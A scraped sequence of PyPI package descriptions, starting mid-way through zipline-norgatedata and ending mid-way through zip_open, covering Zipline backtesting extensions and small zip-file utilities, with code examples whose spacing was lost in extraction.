zipline:ziplineingest-bnorgatedata-sp500-backtestInside your trading system file, you'd incorporate the following code snippets:fromzipline.pipelineimportPipelinefromzipline_norgatedata.pipelinesimport(NorgateDataIndexConstituent,NorgateDataDividendYield)...defmake_pipeline():indexconstituent=NorgateDataIndexConstituent('S&P 500')returnPipeline(columns={'NorgateDataIndexConstituent':indexconstituent,},screen=indexconstituent)definitialize(context):set_benchmark(symbol('$SPXTR'))# Note: $SPXTR must be included in the bundleattach_pipeline(make_pipeline(),'norgatedata_pipeline',chunks=9999,eager=True)# ... your code here ...defbefore_trading_start(context,data):context.pipeline_data=pipeline_output('norgatedata_pipeline')# ... your code here ...defhandle_data(context,data):context.pipeline_data=pipeline_output('norgatedata_pipeline')current_constituents=context.pipeline_data.index# ... your code here ...# Exit positions not in the index todayforassetincontext.portfolio.positions:ifassetnotincontext.assets:order_target_percent(asset,0.0)# ...Worked example backtesting E-Mini S&P 500 futuresThis example created a continuous contract of the E-Mini S&P 500 futures that trade on CME on volume.Create a bundle definition in extensions.py as follows:fromzipline_norgatedataimportregister_norgatedata_futures_bundlebundlename='norgatedata-es-futures'session_symbols=['ES',]symbol_list=['$SPXTR',],start_session='2000-01-01'register_norgatedata_futures_bundle(bundlename,start_session,session_symbols=session_symbols)Now, ingest that bundle into zipline:ziplineingest-bnorgatedata-es-futuresInside your trading system file, you'd incorporate the following code snippets:definitialize(context):set_benchmark(symbol('$SPXTR'))# Note: $SPXTR must be included in the bundle# Obtain market(s)s directly from the bundleaf=context.asset_findermarkets=set([])# a set eliminates dupesallcontracts=af.retrieve_futures_contracts(af.futures_sids)forcontractinallcontracts:markets.add(allcontracts[contract].root_symbol)markets=list(markets)markets.sort()# Make a list of all continuationscontext.universe=[continuous_future(market,offset=0,roll='volume',adjustment='mul')formarketinmarkets]# ... your code here ...defhandle_data(context,data):# Get continuation datahist=data.history(context.universe,fields=['close','volume'],frequency='1d',bar_count=250,# Adjust to whatever lookback period you need)# Now use hist in your calculations# Make a dictionary of open positions, based on the root symbolopen_pos={pos.root_symbol:posforposincontext.portfolio.positions}contracts_to_trade=5forcontinuationincontext.universe:# ...contract=data.current(continuation,'contract')# ...# Add your condtions here to determine if there is an entry then...order_target(contract,contracts_to_trade)# Add your conditions to determine if there is an exit of a position then...order_target(contract,-1*contracts_to_trade)# Finally, if there are open positions check for rollsiflen(open_pos)>0:roll_futures(context,data)MetadataThe following fields are available in the metadata dataframe: start_date, end_date, ac_date, symbol, asset_name, exchange, exchange_full, asset_type, norgate_data_symbol, norgate_data_assetid.Norgate Data Futures Market Session symbolsTo obtain just the futures market sessions symbols, you can use the norgatedata package and adapt the following code:importnorgatedataforsession_symbolinnorgatedata.futures_market_session_symbols():print(session_symbol+" "+norgatedata.futures_market_session_name(session_symbol))Zipline Limitations/QuirksZipline 2.4 and v3 is hardcoded to ignore dates prior to 1990-01-01. It can be patched to 1970-01-01, but no cannot go any further since it uses the Unix Epoch (1970-01-01) as the underlying time storage mechanism.Zipline doesn't define all futures markets and doesn't provide any runtime extensibility in this area - you will need to add them to <your_environment>\lib\site-packages\zipline\finance\constants.py if they are not defined. Be sure to backup this file as it will be overwritten any time you update zipline.Zipline assumes that there are bars for every day of trading. If a security doesn't trade for a given day (e.g. it was halted/suspended, or simply nobody wanted to trade it), it will be padded with the previous close repeated in the OHLC fields, with volume set to zero. Consider how this might affect your trading calculations.Index volumes cannot be accurately ingested due to Zipline trying to convert large volumes to UINTs which are out-of-bounds for UINT32. Index volumes will be divided by 1000.Any stock whose adjusted volume exceeds the upper bound of UINT32 will be set to the maximum UINT32 value (4294967295). This only occurs for stocks with a lot of splits and/or very large special dsitributions.Some stocks have adjusted volume values that fall below the boundaries used by winsorize_uint32 (e.g. volume of 8.225255e-05). You'll see a warning when those stocks are ingested "UserWarning: Ignoring 12911 values because they are out of bounds for uint32". These are There's not much we can do here. For now, just ignore those warnings.Ingestion times could be improved significantly with multiprocessing (this would require Zipline enhancements)Zipline cannot handle negative prices (eg. Crude Oil in 2020) - any such prices will be set to zero. Most systems would have rolled prior to this strange event anyway.Testing on Australian ASX dataBy default, run_algorithm uses the 'NYSE' trading calendar. To backtest other markets, you need to specify the calendar. For the ASX, the calendar name is XASX.At the top of your algorithm:fromexchange_calendarsimportget_calendarIn the run_algorithm call, add a trading_calendar= line, for example:results=run_algorithm(start=start,end=end,initialize=initialize,analyze=analyze,handle_data=handle_data,capital_base=10000,trading_calendar=get_calendar('XASX',start="1990-01-01"),data_frequency='daily',bundle='norgatedata-spasx200',)Testing on Canadian TSX dataBy default, run_algorithm uses the 'NYSE' trading calendar. To backtest other markets, you need to specify the calendar. For the TSX, the calendar name is XTSE.At the top of your algorithm:fromtrading_calendarsimportget_calendarIn the run_algorithm call, add a trading_calendar= line, for example:results=run_algorithm(start=start,end=end,initialize=initialize,analyze=analyze,handle_data=handle_data,capital_base=10000,trading_calendar=get_calendar('XTSE',start="1990-01-01"),data_frequency='daily',bundle='norgatedata-sptsx60',)Be sure to implement the trading_calendars patch mentioned above too.Books/publications that use Zipline, adapted for Norgate Data useWe have adapted the Python code in the following books to use Norgate Data.Trading Evoled: Anyone can Build Killer Trading Strategies in Python.Source code compatible with Zipline (Reloaded) v2.4 in Jupyter notebook format, can be downloaded here:https://norgatedata.com/book-examples/trading-evolved/NorgateDataTradingEvolvedExamples.zipline.300.zipIf there are other book/publications that use Zipline and worth adding here, let us know.FAQsDuring a backtest I receive an error ValueError: 'Time Period' is not in list. How do I fix this?This can occur when the items in the bundle do not match the latest data in the Norgate Data database. For stocks, if there are symbol changes within the database then the bundle will have the old symbol but the Norgate database will have the new symbol. For Futures, there may have been additional futures contracts listed since your previous ingestion and the roll-over algorithm is trying to roll into them.The solution is simple: Ingest the bundle with fresh data.Also consider putting Norgate Data Updater into manual mode for updating and using the NDU Trigger app to explicitly start NDU and obtain updates. More information on this can be found here:https://norgatedata.com/ndu-usage.phpDuring a backtest, an error message is shown for index_constituent_timeseriesFor example, an error such as this is shown:[2023-06-05 07:39:25.720989] INFO: Norgate Data: Populating NorgateDataIndexConstituent pipeline populating with $DJI on 3638 securities from 2000-01-03 to 2023-06-02.... [2023-06-05 07:39:34.734116] ERROR: Norgate Data: index_constituent_timeseries: DBD not found --------------------------------------------------------------------------- KeyError Traceback (most recent call last) (lots of irrelevant trace messages thereafter)The Norgate Data database has been updated since you last performed an ingest, and there have been some symbol changes. In the above example, since the ingest occurred, DBD has been demoted to OTC and has a new symbol of DBDQQ.The solution is simple: Ingest the bundle with fresh data.Also consider putting Norgate Data Updater into manual mode for updating and using the NDU Trigger app to explicitly start NDU and obtain updates. More information on this can be found here:https://norgatedata.com/ndu-usage.phpChange logReleased versions and release dates can be seen here:https://pypi.org/project/zipline-norgatedata/#historyThe CHANGES.TXT within the package details the changes A summary is also shown below.Installing older versionsOlder versions of Zipline-NorgateData can be installed easily using pip. For example, to install v2.0.17.pip install zipline-norgatedata==2.0.17Note that prior versions may be only suited to older versions of Zipline. However, due to the constantly evolving nature of Zipline, we can only really support the current version.SupportFor support on Norgate Data or usage of the zipline-norgatedata extension:Norgate Data supportPlease put separate issues in separate emails, as this ensures each issue is separately ticketed and tracked.For bug reports on Zipline Reloaded, report them on Stefan Jansen'sZipline Reloaded GithubThere is also a Google Group, which isn't used much these days:Zipline Google Group.ThanksThanks to:Andreas Clenowfor his pioneering work in documenting Zipline bundles in his latest bookTrading Evolved: Anyone can Build Killer Trading Strategies in Python. We used many of the techniques described in the book to build our bundle code. There are many excellent examples of how to implement various trading systems including trend following, counter trend following, momentum, curve trading and combining multiple trading systems together.Norgate Data alpha and beta testers. Without your persistence we wouldn't have implemented half of the features.The team that were formerly employed by Quantopian for developing and open sourcing ZiplineContinued development efforts on Zipline and associated packages since Quantopian ceased, byStefan Jansen, Mehdi Bounouar, Allan Coppola and Shlomi Kushchi and many more.Recent Version Historyv2.3.0 20220728 Bump to v2.3.0 due to version checking issue v2.3.1 20221027 Added Mac M1/M2 workaround to docs v2.3.2 20221114 Notes on Juneteenth holiday patch v2.3.3 20230122 Notes on TSXFailures patch v2.3.4 20230222 Update documentation to specify sqlalchemy<2 v2.4.0 20230506 Change to zipline-reloaded and pyfolio-reloaded via conda-forge v2.4.1 20230507 Minor documentation fixes on installation method v2.4.1 20230507 Documentation fixes v2.4.2 20230507 Documentation fixes, revised Clenow scripts v2.4.3 20230606 Revised information on extending backtests to 1970 by patching Zipline, better start/end session handling so that you don't have to be on an actual trading date v2.4.4 20230709 Prevent TypeError: Cannot compare tz-naive and tz-aware timestamps on bundle ingest when normalizing start and end session dates v3.0.0 20231005 Fix a few typos in the instructions, convert the deprecated Pandas fillna to ffill and bfill. Fully tested against Zipline v3, Added BlankCheckCompany pipeline v3.0.1 20231005 Updated Trading Evolved scripts v3.0.2 20240111 Added h5py to install instructions due to incorrect package dependency in conda-forge v3.0.3 20240111 Docs
zipline-poloniex
Poloniex data bundle forzipline, the pythonic algorithmic trading library.DescriptionJust install the data bundle with pip:pip install zipline-poloniexand create a file$HOME/.zipline/extension.pycalling zipline’sregisterfunction. Thecreate_bundlefunction returns the necessary ingest function forregister. Use thePairsrecord for common US-Dollar to crypto-currency pairs.ExampleAdd following content to$HOME/.zipline/extension.py:importpandasaspdfromzipline_polonieximportcreate_bundle,Pairs,register# adjust the following lines to your needsstart_session=pd.Timestamp('2016-01-01',tz='utc')end_session=pd.Timestamp('2016-12-31',tz='utc')assets=[Pairs.usdt_eth]register('poloniex',create_bundle(assets,start_session,end_session,),calendar_name='POLONIEX',minutes_per_day=24*60,start_session=start_session,end_session=end_session)Ingest the data with:zipline ingest -b poloniexCreate your trading algorithm, e.g.my_algorithm.pywith:importloggingfromzipline.apiimportorder,record,symbolfromzipline_poloniex.utilsimportsetup_logging__author__="Florian Wilhelm"__copyright__="Florian Wilhelm"__license__="new-bsd"# setup logging and allsetup_logging(logging.INFO)_logger=logging.getLogger(__name__)_logger.info("Dummy agent loaded")definitialize(context):_logger.info("Initializing agent...")# There seems no "nice" way to set the emission rate to minutecontext.sim_params._emission_rate='minute'defhandle_data(context,data):_logger.debug("Handling data...")order(symbol('ETH'),10)record(ETH=data.current(symbol('ETH'),'price'))Run your algorithm inmy_algorithm.pywith:zipline run -f ./my_algorithm.py -s 2016-01-01 -e 2016-12-31 -o results.pickle --data-frequency minute -b poloniexAnalyze the performance by readingresults.picklewith the help of Pandas.NoteThis project has been set up using PyScaffold 2.5.7. For details and usage information on PyScaffold seehttp://pyscaffold.readthedocs.org/.
zipline.py
Quickstartimportasyncioimportziplineasyncdefmain():asyncwithzipline.Client("your_zipline_site.com","your_zipline_token")asclient:files=awaitclient.get_all_files()forfileinfiles:print(file.name)asyncio.run(main())Documentation availableHERE.
zipline-reloaded
Backtest your Trading StrategiesVersion InfoTestStatusCommunityZipline is a Pythonic event-driven system for backtesting, developed and used as the backtesting and live-trading engine bycrowd-sourced investment fund Quantopian. Since it closed late 2020, the domain that had hosted these docs expired. The library is used extensively in the bookMachine Larning for Algorithmic TradingbyStefan Jansenwho is trying to keep the library up to date and available to his readers and the wider Python algotrading community.Join our Community!DocumentationFeaturesEase of Use:Zipline tries to get out of your way so that you can focus on algorithm development. See below for a code example.Batteries Included:many common statistics like moving average and linear regression can be readily accessed from within a user-written algorithm.PyData Integration:Input of historical data and output of performance statistics are based on Pandas DataFrames to integrate nicely into the existing PyData ecosystem.Statistics and Machine Learning Libraries:You can use libraries like matplotlib, scipy, statsmodels, and scikit-klearn to support development, analysis, and visualization of state-of-the-art trading systems.Note:Release 3.0 updates Zipline to usepandas>= 2.0 andSQLAlchemy> 2.0. These are major version updates that may break existing code; please review the linked docs.Note:Release 2.4 updates Zipline to useexchange_calendars>= 4.2. This is a major version update and may break existing code (which we have tried to avoid but cannot guarantee). Please review the changeshere.InstallationZipline supports Python >= 3.8 and is compatible with current versions of the relevantNumFOCUSlibraries, includingpandasandscikit-learn.UsingpipIf your system meets the pre-requisites described in theinstallation instructions, you can install Zipline usingpipby running:pipinstallzipline-reloadedUsingcondaIf you are using theAnacondaorminicondadistributions, you installzipline-reloadedfrom the channelconda-forgelike so:condainstall-cconda-forgezipline-reloadedYou can alsoenableconda-forgeby listing it in your.condarc.In case you are installingzipline-reloadedalongside other packages and encounterconflict errors, consider usingmambainstead.See theinstallationsection of the docs for more detailed instructions and the correspondingconda-forge site.QuickstartSee ourgetting started tutorial.The following code implements a simple dual moving average algorithm.fromzipline.apiimportorder_target,record,symboldefinitialize(context):context.i=0context.asset=symbol('AAPL')defhandle_data(context,data):# Skip first 300 days to get full windowscontext.i+=1ifcontext.i<300:return# Compute averages# data.history() has to be called with the same params# from above and returns a pandas dataframe.short_mavg=data.history(context.asset,'price',bar_count=100,frequency="1d").mean()long_mavg=data.history(context.asset,'price',bar_count=300,frequency="1d").mean()# Trading logicifshort_mavg>long_mavg:# order_target orders as many shares as needed to# achieve the desired number of shares.order_target(context.asset,100)elifshort_mavg<long_mavg:order_target(context.asset,0)# Save values for later inspectionrecord(AAPL=data.current(context.asset,'price'),short_mavg=short_mavg,long_mavg=long_mavg)You can then run this algorithm using the Zipline CLI. But first, you need to download some market data with historical prices and trading volumes:$ziplineingest-bquandl $ziplinerun-fdual_moving_average.py--start2014-1-1--end2018-1-1-odma.pickle--no-benchmarkThis will download asset pricing data sourced fromQuandl(sinceacquisitionhosted by NASDAQ), and stream it through the algorithm over the specified time range. Then, the resulting performance DataFrame is saved asdma.pickle, which you can load and analyze from Python.You can find other examples in thezipline/examplesdirectory.Questions, suggestions, bugs?If you find a bug or have other questions about the library, feel free toopen an issueand fill out the template.
zipline-tej
InstallationUsed packages and environmentMain package: ZiplinePython 3.8 or above (currently support up to 3.11)Microsoft Windows OS or macOS or LinuxOther Python dependency packages: Pandas, Numpy, Logbook, Exchange-calendars, etc.How to install Zipline Reloaded modified by TEJWe're going to illustrate under anaconda environment, so we suggest usingAnacondaas development environment.Download dependency packages.Windows(zipline-tej.yml)Mac(zipline-tej_mac.yml)Start an Anaconda (base) prompt, create an virtual environment and install the appropriate versions of packages: (Westronglyrecommand using virtual environment to keep every project independent.)(reason)Windows Users # change directionary to the folder exists zipline-tej.yml $ cd <C:\Users\username\Downloads> # create virtual env $ conda env create -f zipline-tej.yml # activate virtual env $ conda activate zipline-tej Mac Users # change directionary to the folder exists zipline-tej_mac.yml $ cd <C:\Users\username\Downloads> # create virtual env $ conda env create -f zipline-tej_mac.yml # activate virtual env $ conda activate zipline-tejAlso, if you are familiar with Python enough, you can create a virtual environment without zipline-tej.yml and here's the sample :# create virtual env $ conda create -n <env_name> python=3.10 # activate virtual env $ conda activate <env_name> # download dependency packages $ pip install zipline-tejWhile encountering environment problems, we provided a consistent and stable environment onDocker hub.For users that using docker, we briefly introduce how to download and use it.First of all, please download and installdocker-desktop.1. Start docker-desktop. (Registration is not must.) 2. Select the "images" on the leftside and search "tej87681088/tquant" and click "Pull". 3. After the image was downloaded, click the "run" icon the enter the optional settings. 3-1. Contaner-name: whatever you want. 3-2. Ports: the port to connect, "8888" is recommended. 3-3. Volumes: the place to store files. (You can create volume first on the left side.) e.g. created a volume named "data", host path enter "data", container path "/app" is recommended. 4. Select the "Containers" leftside, the click the one which its image name is tej87681088/tquant 5. In its "Logs" would show an url like http://127.0.0.1:8888/tree?token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 6. Go to your browser and enter "http://127.0.0.1:<port_you_set_in_step_3-2>/tree?token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" 6-1. If your port is 8888, you can just click the hyperlink. 7. Start develop your strategy! NOTICE: Next time, we just need to reproduce step4 to step6.Quick startCLI InterfaceThe following code implements a simple buy-and-hold trading algorithm.fromzipline.apiimportorder,record,symboldefinitialize(context):context.asset=symbol("2330")defhandle_data(context,data):order(context.asset,10)record(TSMC=data.current(context.asset,"price"))defanalyze(context=None,results=None):importmatplotlib.pyplotasplt# Plot the portfolio and asset data.ax1=plt.subplot(211)results.portfolio_value.plot(ax=ax1)ax1.set_ylabel("Portfolio value (TWD)")ax2=plt.subplot(212,sharex=ax1)results.TSMC.plot(ax=ax2)ax2.set_ylabel("TSMC price (TWD)")# Show the plot.plt.gcf().set_size_inches(18,8)plt.show()You can then run this algorithm using the Zipline CLI. But first, you need to download some market data with historical prices and trading volumes:Before ingesting data, you have to set some environment variables as follow:# setting TEJAPI_KEY to get permissions loading data $ set TEJAPI_KEY=<your_key> $ set TEJAPI_BASE=https://api.tej.com.tw # setting download ticker $ set ticker=2330 2317 # setting backtest period $ set mdate=20200101 20220101Ingest and run backtesting algorithm$ zipline ingest -b tquant $ zipline run -f buy_and_hold.py --start 20200101 --end 20220101 -o bah.pickle --no-benchmark --no-treasuryThen, the resulting performance DataFrame is saved as bah.pickle, which you can load and analyze from Python.More useful zipline commandsBefore callingziplinein CLI, be sure that TEJAPI_KEY and TEJAPI_BASE were set. Usezipline --helpto get more information.For example : We want to know how to usezipline run, we can run as follow:zipline run --helpUsage: zipline run [OPTIONS] Run a backtest for the given algorithm. Options: -f, --algofile FILENAME The file that contains the algorithm to run. -t, --algotext TEXT The algorithm script to run. -D, --define TEXT Define a name to be bound in the namespace before executing the algotext. For example '-Dname=value'. The value may be any python expression. These are evaluated in order so they may refer to previously defined names. --data-frequency [daily|minute] The data frequency of the simulation. [default: daily] --capital-base FLOAT The starting capital for the simulation. [default: 10000000.0] -b, --bundle BUNDLE-NAME The data bundle to use for the simulation. [default: tquant] --bundle-timestamp TIMESTAMP The date to lookup data on or before. [default: <current-time>] -bf, --benchmark-file FILE The csv file that contains the benchmark returns --benchmark-symbol TEXT The symbol of the instrument to be used as a benchmark (should exist in the ingested bundle) --benchmark-sid INTEGER The sid of the instrument to be used as a benchmark (should exist in the ingested bundle) --no-benchmark If passed, use a benchmark of zero returns. -bf, --treasury-file FILE The csv file that contains the treasury returns --treasury-symbol TEXT The symbol of the instrument to be used as a treasury (should exist in the ingested bundle) --treasury-sid INTEGER The sid of the instrument to be used as a treasury (should exist in the ingested bundle) --no-treasury If passed, use a treasury of zero returns. -s, --start DATE The start date of the simulation. -e, --end DATE The end date of the simulation. -o, --output FILENAME The location to write the perf data. If this is '-' the perf will be written to stdout. [default: -] --trading-calendar TRADING-CALENDAR The calendar you want to use e.g. TEJ_XTAI. TEJ_XTAI is the default. --print-algo / --no-print-algo Print the algorithm to stdout. --metrics-set TEXT The metrics set to use. New metrics sets may be registered in your extension.py. --blotter TEXT The blotter to use. [default: default] --help Show this message and exit.New add tickers$ zipline add -t "<ticker_wants_to_add>"If tickers are more than 1 ticker, split them apart by " " or "," or ";".For more detail usezipline add --help.Display bundle-info$ zipline bundle-infoTo show what the tickers are there in newest bundle.For more detail usezipline bundle-info --help.Switch bundleBefore using switch, usezipline bundlesto get the timestamp of each folder.$ zipline switch -t "<The_timestamp_of_the_folder_want_to_use>"Due to zipline only using the newest foler, switch can make previous folder become newest.For more detail usezipline switch --help.Update bundle$ zipline updateTo update the bundle information to newest date.For more detail usezipline update --help.Jupyter NotebookChange Anaconda kernelSince we've downloaded package "nb_conda_kernels", we should be able to change kernel in jupyter notebook.How to new a notebook using specific kernel(1) Open anaconda prompt(2) Enter the command as follow :# First one can be ignore if already in environment of zipline-tej $ conda activate zipline-tej # start a jupyter notebook $ jupyter notebook(3) Start a notebook and select Python[conda env:zipline-tej](4)(Optional) If you have already written a notebook, you can open it and change kernel by clicking the "Kernel" in menu and "Change kernel" to select the specfic kernel.Set environment variables TEJAPI_KEY, ticker and mdate* ticker would be your target ticker symbol, and it should be a string. If there're more than one ticker needed, use " ", "," or ";" to split them apart.* mdate refers the begin date and end date, use " ", "," or ";" to split them apart.In[1]:importosos.environ['TEJAPI_KEY']=<your_key>os.environ['ticker']='2330 2317'os.environ['mdate']='20200101 20220101'Call ingest to download data to ~\.ziplineIn[2]:!ziplineingest-btquant[Out]:Mergingdailyequityfiles:[YYYY-MM-DDHH:mm:ss.ssssss]INFO:zipline.data.bundles.core:Ingestingtquant.Design the backtesting strategyIn[3]:fromzipline.apiimportorder,record,symboldefinitialize(context):context.asset=symbol("2330")defhandle_data(context,data):order(context.asset,10)record(TSMC=data.current(context.asset,"price"))defanalyze(context=None,results=None):importmatplotlib.pyplotasplt# Plot the portfolio and asset data.ax1=plt.subplot(211)results.portfolio_value.plot(ax=ax1)ax1.set_ylabel("Portfolio value (TWD)")ax2=plt.subplot(212,sharex=ax1)results.TSMC.plot(ax=ax2)ax2.set_ylabel("TSMC price (TWD)")# Show the plot.plt.gcf().set_size_inches(18,8)plt.show()Run backtesting algorithm and plotIn[4]:fromziplineimportrun_algorithmimportpandasaspdfromzipline.utils.calendar_utilsimportget_calendartrading_calendar=get_calendar('TEJ_XTAI')start=pd.Timestamp('20200103',tz='utc')end=pd.Timestamp('20211230',tz='utc')result=run_algorithm(start=start,end=end,initialize=initialize,capital_base=1000000,handle_data=handle_data,bundle='tquant',trading_calendar=trading_calendar,analyze=analyze,data_frequency='daily')[Out]:Show trading processIn[5]:result[Out]:period_openperiod_closestarting_valueending_valuestarting_cashending_cashportfolio_valuelongs_countshorts_countlong_value...treasury_period_returntrading_daysperiod_labelalgo_volatilitybenchmark_period_returnbenchmark_volatilityalgorithm_period_returnalphabetasharpe2020-01-03 05:30:00+00:002020-01-03 01:01:00+00:002020-01-03 05:30:00+00:000.00.01.000000e+061.000000e+061.000000e+06000.0...0.012020-01NaN0.0NaN0.000000NoneNoneNaN2020-01-06 05:30:00+00:002020-01-06 01:01:00+00:002020-01-06 05:30:00+00:000.03320.01.000000e+069.966783e+059.999983e+05103320.0...0.022020-010.0000190.00.0-0.000002NoneNone-11.2249722020-01-07 05:30:00+00:002020-01-07 01:01:00+00:002020-01-07 05:30:00+00:003320.06590.09.966783e+059.933817e+059.999717e+05106590.0...0.032020-010.0002370.00.0-0.000028NoneNone-10.0385142020-01-08 05:30:00+00:002020-01-08 01:01:00+00:002020-01-08 05:30:00+00:006590.09885.09.933817e+059.900850e+059.999700e+05109885.0...0.042020-010.0002030.00.0-0.000030NoneNone-9.2981282020-01-09 05:30:00+00:002020-01-09 01:01:00+00:002020-01-09 05:30:00+00:009885.013500.09.900850e+059.867083e+051.000208e+061013500.0...0.052020-010.0017540.00.00.000208NoneNone5.986418..................................................................2021-12-24 05:30:00+00:002021-12-24 01:01:00+00:002021-12-24 05:30:00+00:002920920.02917320.0-1.308854e+06-1.314897e+061.602423e+06102917320.0...0.04842021-120.2327910.00.00.602423NoneNone1.1707432021-12-27 05:30:00+00:002021-12-27 01:01:00+00:002021-12-27 05:30:00+00:002917320.02933040.0-1.314897e+06-1.320960e+061.612080e+06102933040.0...0.04852021-120.2325770.00.00.612080NoneNone1.1828642021-12-28 05:30:00+00:002021-12-28 01:01:00+00:002021-12-28 05:30:00+00:002933040.02982750.0-1.320960e+06-1.327113e+061.655637e+06102982750.0...0.04862021-120.2330860.00.00.655637NoneNone1.2379582021-12-29 05:30:00+00:002021-12-29 01:01:00+00:002021-12-29 05:30:00+00:002982750.02993760.0-1.327113e+06-1.333276e+061.660484e+06102993760.0...0.04872021-120.2328500.00.00.660484NoneNone1.2431762021-12-30 05:30:00+00:002021-12-30 01:01:00+00:002021-12-30 05:30:00+00:002993760.02995050.0-1.333276e+06-1.339430e+061.655620e+06102995050.0...0.04882021-120.2326290.00.00.655620NoneNone1.235305488 rows × 38 columnsMore Zipline TutorialsFor moretutorialsSuggestionsTo get TEJAPI_KEY(link)TEJ Official Website
zipline-trader
zipline-traderWelcome to zipline-trader, the on-premise trading platform built on top of Quantopian’szipline.This project is meant to be used for backtesting/paper/live trading with one the following brokers:Interactive BrokersAlpacaPleaseRead The DocsAnd you could find us onslack
zipload
No description available on PyPI.
zipls
A script to help you zip playlists.Homepage:http://bitbucket.org/quodlibetor/ziplsContentsInstallationUsageUsersGraphical UseCommand LineProgrammersExtendingWorks WithContact and CopyingInstallationTo make this work best you want to have pip (http://pypi.python.org/pypi/pip) installed, although technically it is possible to install it without it.From a terminal, (Terminal.app if you’re on a Mac, or whatever turns you on) after installing pip, do:sudo pip install argparse mutagen ziplsThat should do it. If it doesn’t, pleasecontactme.UsageUsersGraphical UseAfter installation there should be a programziplsthat you can run. Run it.That is to say that, in general, if you run zipls without any arguments it will give you a gui.If you run it from a command line with playlist files as arguments, you can give it the-gswitch to make it still run in graphical mode. All arguments given to the command line should still apply even if run in graphics mode.Command LineTypically:zipls PLAYLIST.plsthat’ll generate a zip file PLAYLIST.zip with a folder PLAYLIST inside of it with all the songs pointed to by PLAYLIST.pls.And of course:zipls --helpworks. (Did you think I was a jerk?)ProgrammersBasically all you care about is theSongsclass from zipls. It takes a path, or list of paths, to a playlist and knows how to zip them:from zipls import Songs songs = Songs("path/to/playlist.m3u") # __init__ just goes through add(): songs.add("path/to/another/playlist.xspf") # lists of paths also work: songs.add(['another.pls', 'something/else.m3u']) songs.zip_em('path/to/zipcollection')ExtendingFirst of all, just email me with an example of the playlist that you want zipls to parse and I’ll do it. But if you want tonotmonkey-patch it:If you want to add a new playlist format with extension EXT: subclassSongsand implement a function_songs_from_EXT(self, 'path/to/pls')that expects to receive a path to the playlist.Similarly, if you want to add audio format reading capabilities subclassSong(singular) and create a_set_artist_from_EXT, where EXT is the extension of the music format you want to add. You’ll also need to initializeSongswith your new song class.So if I wanted to add.spfplaylists and.musaudio:class MusSong(zipls.Song): def _set_artist_from_mus(self): # and then probably: from mutagen.mus import Mus self.artist = Mus(self.path)['artist'][0] class SpfSongs(zipls.Songs): def _songs_from_spf(self, playlist): # add songs songs = SpfSongs('path/to/playlist', MusSong)Works Withplaylist formats:.pls.xspf.m3uA variety of common audio formats. (Ogg Vorbis, MP3/4, FLAC…) Basically everything supported bymutagenshould workContact and CopyingMy name’s Brandon, email me [email protected], and the project home page ishttp://bitbucket.org/quodlibetor/zipls.Basically do whatever you want, and if you make something way better based on this, lemme know.Copyright (C) 2010 Brandon W [email protected] program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
zipmigo
ZipmigoZipmigo is intended to assist fledgling data analysts and scientists with the process of downloading a zip file via http and unzipping it into the working directory when working in a notebook environment, saving them time and energy wading throughos,requests, and running shell commands to inspect the directory structure.StoryThis package was born of the author's hatred for recursive folders within zip files, as well as her need to use the same commands over and over again to download & unpack zip archives. Over the course of a project, she found herself constantly reusing code snippets - a sign that one should wrap it up into a script. However, she was working in google colab, which was designed for collaborative notebook workflows. It seemed that distributing a package on PyPi was the easiest way to import a script into colab for her audience, and thus zipmigo was born.InstallationZipmigo is available for commandline installation from PyPi viapip install zipmigo.Google ColabRun!pip install zipmigoFrom Sourcegit clone https://github.com/kaszklar/zipmigo.gitto your directory of choice.cd zipmigoand install withpython setup.py install.ExamplesImportingimport zipmigoDownload a zip fileDownload a file to the current working directory. The status of the connection and the progress of the download will be printed out.zipmigo.download("https://geo.nyu.edu/download/file/harvard-ntadcd106-shapefile.zip",'congressdistricts.zip')Print out the contents of the current working directory & subdirectorieszipmigo.list_dir()UnzipUnpack zip file into current directory. If the archive has only directories in the root, those directories will be placed in the current working directory.zipmigo.unzip("congressdistricts.zip")Release History[1.1.0] 2020.08.12Refactor for namespaceAdjust download control flow[1.0.1] 2020.05.05Some error handling and type assertionsCorrect readme instructions[1.0.0] 2020.02.13Initial Release 🎉Future features?Inspect zip archive prior to openingExtract a single file from the archive
zipminator
ZipminatorZipminator is a lightweight python package with two main functionalities; Zipndel or Unzipndel, for zipping or unzipping a password-protected pandas DataFrame file, and then deleting the original file.Example usagepip install zipminatorzipitfromzipminator.zipitimportZipndelimportpandasaspdimportgetpassimportzipfileimportoscreate instance of Zipndel and call zipit methodzipndel=Zipndel(file_name='df',file_format='csv')df=pd.DataFrame({'A':[1,2,3],'B':[4,5,6],'C':[7,8,9]})zipndel.zipit(df)unzipitfromzipminator.unzipitimportUnzipndelcreate instance of Unzipndel and call unzipit methodunzipndel=Unzipndel(file_name='df',file_format='csv')df=unzipndel.unzipit()df
zipndel
No description available on PyPI.
zipnish
A micro-service monitoring tool based on Varnish Cache.DocumentationChangelogSource
zipo
zippthis is a .zip file aggregateInstallationpipinstallzippimportzipp# backup2zipzipp.backup2zip(floder=,backupfilename=)# decompressionzipp.decompression(name=)
zip_open
zip_openopen file from nested zip file archive.If you use static file like as ‘data.zip’ and open this from your python code, Your program will become likeopen(os.path.join(os.path.dirname(__file__),'data.zip')). But if your packages are packed into packages.zip file (zipped-egg, or cases to gather in one file on Google App Engine matter), your code doesn’t work fine.In this situation, the file path of data.zip becomes/path/to/packages.zip/data.zip, then your program can’t open the data.zip file.zip_openpackage solves this problem.FeaturesOpen file from nested zip archive file path/name.Open file from nested zip archive file-like-object.Using sample1: open the file from zip filepackages1.zip is:packages1.zip + file1.txtOpen file1.txt:>>> from zip_open import zopen >>> fobj = zopen('packages1.zip/file1.txt') >>> data = fobj.read() >>> print(data) I am file1.txt, ok.You can specifiy zopen subpath args:>>> fobj = zopen('packages1.zip', 'file1.txt') >>> print(fobj.read()) I am file1.txt, ok.These code samples equivalent to below code:>>> from zipfile import ZipFile >>> zipobj = ZipFile('packages1.zip') >>> data = zipobj.read('file1.txt') >>> print(data) I am file1.txt, ok.Using sample2: open the file from nested zip filepackages2.zip is:packages2.zip + data2.zip + file2.txtOpen file2.txt:>>> from zip_open import zopen >>> fobj = zopen('packages2.zip/data2.zip/file2.txt') >>> print(fobj.read()) I 